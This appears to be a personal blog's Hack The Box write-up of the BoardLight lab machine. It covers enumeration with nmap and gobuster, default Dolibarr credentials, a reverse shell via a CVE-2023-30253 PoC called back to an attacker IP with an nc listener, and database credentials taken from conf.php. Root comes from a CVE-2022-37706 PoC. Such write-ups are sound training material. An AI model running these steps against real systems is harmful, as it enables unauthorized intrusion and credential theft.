Table of contents

  1. BoardLight [HTB] — Writeup
  2. Exploiting CVE-2023-30253
  3. Credential Discovery
  4. Privilege Escalation via CVE-2022-37706

BoardLight [HTB] — Writeup

17/09/2025 / 4 minutes to read / Tags: ctf, htb, hackthebox, rce, writeup

So, I started working on HTB again after a small break and came across the machine BoardLight.

Upon firing up the machine, I used nmap to check for active ports:

Terminal window
nmap -sV -sC -A 10.10.11.11
nmap output

This revealed two open ports: Port 22 and Port 80. At the bottom of the webpage I noticed the domain board.htb and added it to /etc/hosts. I then tried vhost enumeration:

Terminal window
gobuster vhost -u http://board.htb -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain
gobuster vhost results showing crm.board.htb

This returned crm.board.htb — a Dolibarr 17.0.0 CRM.

Dolibarr login page

Default credentials admin/admin got me in.

Dolibarr dashboard after login

Exploiting CVE-2023-30253

Dolibarr prior to 17.0.1 is vulnerable to RCE. I found a PoC on GitHub and ran it:

Terminal window
python3 exploit.py http://crm.board.htb admin admin 10.10.14.28 443
nc -lvnp 443
exploit running and reverse shell obtained

Got a shell. Found a user larissa in /home but couldn’t access it directly.

permission denied accessing larissa folder

Tried changing permissions but that didn’t work either.

chown operation not permitted

Credential Discovery

Searched Dolibarr’s conf/conf.php and found database credentials.

credentials found in conf.php

Used them to SSH in as larissa and grabbed the user flag.

larissa shell with user flag

Privilege Escalation via CVE-2022-37706

Tried sudo -l but no luck.

sudo -l showing no permissions

Ran LinPEAS which flagged Enlightenment below version 0.25.4 — vulnerable to RCE via CVE-2022-37706.

linpeas output highlighting CVE-2022-37706

Ran the PoC exploit and got root.

root shell obtained
← Back to blog